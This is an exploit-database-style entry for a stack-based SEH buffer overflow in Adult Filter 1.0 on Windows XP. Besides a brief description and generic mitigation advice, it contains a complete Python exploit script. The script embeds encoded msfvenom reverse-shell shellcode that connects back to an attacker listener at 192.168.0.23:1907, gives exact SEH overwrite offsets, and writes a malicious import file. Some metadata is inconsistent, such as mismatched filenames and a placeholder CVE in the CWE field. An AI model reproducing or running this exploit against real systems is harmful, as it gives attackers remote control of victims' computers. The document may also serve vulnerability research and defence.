Adult Filter 1.0 - Buffer Overflow (SEH)

vendor:

Adult Filter

by:

Özkan Mustafa Akkus

7.5

CVSS

HIGH

Buffer Overflow

CWE

Product Name: Adult Filter

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE: CVE-XXXX-XXXX

CPE: cpe:2.3:a:armcode:adult_filter:1.0:::::windows_xp_professional:sp3:english

Metasploit:

Other Scripts:

Platforms Tested: Windows XP Professional SP3 (ENG)

2018

Adult Filter 1.0 – Buffer Overflow (SEH)

The Adult Filter 1.0 software is vulnerable to a buffer overflow vulnerability, specifically a Stack-based Buffer Overflow. This vulnerability allows an attacker to execute arbitrary code on the target system by sending a specially crafted request that exceeds the buffer size allocated for processing the request. This can lead to remote code execution, giving the attacker full control over the affected system.

Mitigation:

To mitigate this vulnerability, it is recommended to update to the latest version of the Adult Filter software, as the vendor may have released a patch that addresses this issue. Additionally, it is advised to have proper network security measures in place, such as firewalls and intrusion detection systems, to detect and prevent potential exploitation of this vulnerability.

Source

Exploit-DB raw data:

# Exploit Title: Adult Filter 1.0 - Buffer Overflow (SEH)
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Discovery Date: 2018-10-25
# Homepage: http://www.armcode.com/adult-filter/
# Software Link: http://www.armcode.com/downloads/adult-filter.exe
# Version: 1.0
# Tested on: Windows XP Professional SP3 (ENG)
# Steps to Reproduce: Run the python exploit script, it will create a new file
# with the name "greetz-phr-key-onkan-cwd.txt".
# Start Adult Filter 1.0 click "Options" click "Black Domain List" click "Import"
# Select "greetz-cwd-onkan-key-phr.txt" and Click after select "name.txt" "OK" connect victim machine on port 1907
 
#!/usr/bin/python -w

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.23 LPORT=1907 EXITFUNC=thread -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x1a"
# Payload size: 351 bytes

filename="greetz-cwd-onkan-key-phr.txt"
shellcode=("\xba\x80\xfe\xaf\x95\xda\xcb\xd9\x74\x24\xf4\x5e\x29\xc9\xb1"
"\x52\x83\xee\xfc\x31\x56\x0e\x03\xd6\xf0\x4d\x60\x2a\xe4\x10"
"\x8b\xd2\xf5\x74\x05\x37\xc4\xb4\x71\x3c\x77\x05\xf1\x10\x74"
"\xee\x57\x80\x0f\x82\x7f\xa7\xb8\x29\xa6\x86\x39\x01\x9a\x89"
"\xb9\x58\xcf\x69\x83\x92\x02\x68\xc4\xcf\xef\x38\x9d\x84\x42"
"\xac\xaa\xd1\x5e\x47\xe0\xf4\xe6\xb4\xb1\xf7\xc7\x6b\xc9\xa1"
"\xc7\x8a\x1e\xda\x41\x94\x43\xe7\x18\x2f\xb7\x93\x9a\xf9\x89"
"\x5c\x30\xc4\x25\xaf\x48\x01\x81\x50\x3f\x7b\xf1\xed\x38\xb8"
"\x8b\x29\xcc\x5a\x2b\xb9\x76\x86\xcd\x6e\xe0\x4d\xc1\xdb\x66"
"\x09\xc6\xda\xab\x22\xf2\x57\x4a\xe4\x72\x23\x69\x20\xde\xf7"
"\x10\x71\xba\x56\x2c\x61\x65\x06\x88\xea\x88\x53\xa1\xb1\xc4"
"\x90\x88\x49\x15\xbf\x9b\x3a\x27\x60\x30\xd4\x0b\xe9\x9e\x23"
"\x6b\xc0\x67\xbb\x92\xeb\x97\x92\x50\xbf\xc7\x8c\x71\xc0\x83"
"\x4c\x7d\x15\x03\x1c\xd1\xc6\xe4\xcc\x91\xb6\x8c\x06\x1e\xe8"
"\xad\x29\xf4\x81\x44\xd0\x9f\x6d\x30\xda\x48\x06\x43\xda\x71"
"\xa5\xca\x3c\x17\x59\x9b\x97\x80\xc0\x86\x63\x30\x0c\x1d\x0e"
"\x72\x86\x92\xef\x3d\x6f\xde\xe3\xaa\x9f\x95\x59\x7c\x9f\x03"
"\xf5\xe2\x32\xc8\x05\x6c\x2f\x47\x52\x39\x81\x9e\x36\xd7\xb8"
"\x08\x24\x2a\x5c\x72\xec\xf1\x9d\x7d\xed\x74\x99\x59\xfd\x40"
"\x22\xe6\xa9\x1c\x75\xb0\x07\xdb\x2f\x72\xf1\xb5\x9c\xdc\x95"
"\x40\xef\xde\xe3\x4c\x3a\xa9\x0b\xfc\x93\xec\x34\x31\x74\xf9"
"\x4d\x2f\xe4\x06\x84\xeb\x04\xe5\x0c\x06\xad\xb0\xc5\xab\xb0"
"\x42\x30\xef\xcc\xc0\xb0\x90\x2a\xd8\xb1\x95\x77\x5e\x2a\xe4"
"\xe8\x0b\x4c\x5b\x08\x1e")

evil="\x90"*20 + shellcode

# Bad chars : "\x00\x0a\x0d\x1a"
# 0x03912524 [SetMgr.DLL] ASLR: False, Rebase: False, SafeSEH: False, OS: False | pop edi # pop esi # ret

b = "A"*4108 + "\xEB\x06\x90\x90" + "\x24\x25\x91\x03" + evil+ "B" * (1384-len(evil))

textfile = open (filename, 'w')

textfile.write(b)

textfile.close()